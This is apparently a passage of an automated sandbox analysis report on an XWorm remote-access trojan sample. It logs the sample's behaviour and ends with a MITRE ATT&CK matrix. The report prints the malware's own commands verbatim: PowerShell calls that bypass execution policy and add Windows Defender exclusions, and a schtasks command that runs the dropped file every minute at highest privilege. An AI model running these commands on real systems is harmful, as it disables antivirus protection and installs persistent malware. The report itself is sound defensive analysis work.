            Source: C:\Users\user\AppData\Roaming\boostProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\boostProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe'
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\boost'
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe'Jump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\boost'Jump to behavior
            Bypasses PowerShell execution policy
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe'
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe'Jump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'aZDwfEKorn.exe'Jump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\boost'Jump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boost'Jump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost"Jump to behavior
            Source: aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003046000.00000004.00000800.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003046000.00000004.00000800.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003046000.00000004.00000800.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003046000.00000004.00000800.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
            Source: aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003046000.00000004.00000800.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeQueries volume information: C:\Users\user\Desktop\aZDwfEKorn.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\boostQueries volume information: C:\Users\user\AppData\Roaming\boost VolumeInformation
            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\AppData\Roaming\boostQueries volume information: C:\Users\user\AppData\Roaming\boost VolumeInformation
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: aZDwfEKorn.exe, 00000000.00000002.2535770100.000000001BED8000.00000004.00000020.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2535770100.000000001BF06000.00000004.00000020.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2523345166.0000000001271000.00000004.00000020.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2535770100.000000001BEBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: aZDwfEKorn.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.aZDwfEKorn.exe.d30000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: aZDwfEKorn.exe PID: 5900, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\boost, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: aZDwfEKorn.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.aZDwfEKorn.exe.d30000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: aZDwfEKorn.exe PID: 5900, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\boost, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		12
            Process Injection            		21
            Masquerading            		1
            Input Capture            		231
            Security Software Discovery            		Remote Services1
            Input Capture            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
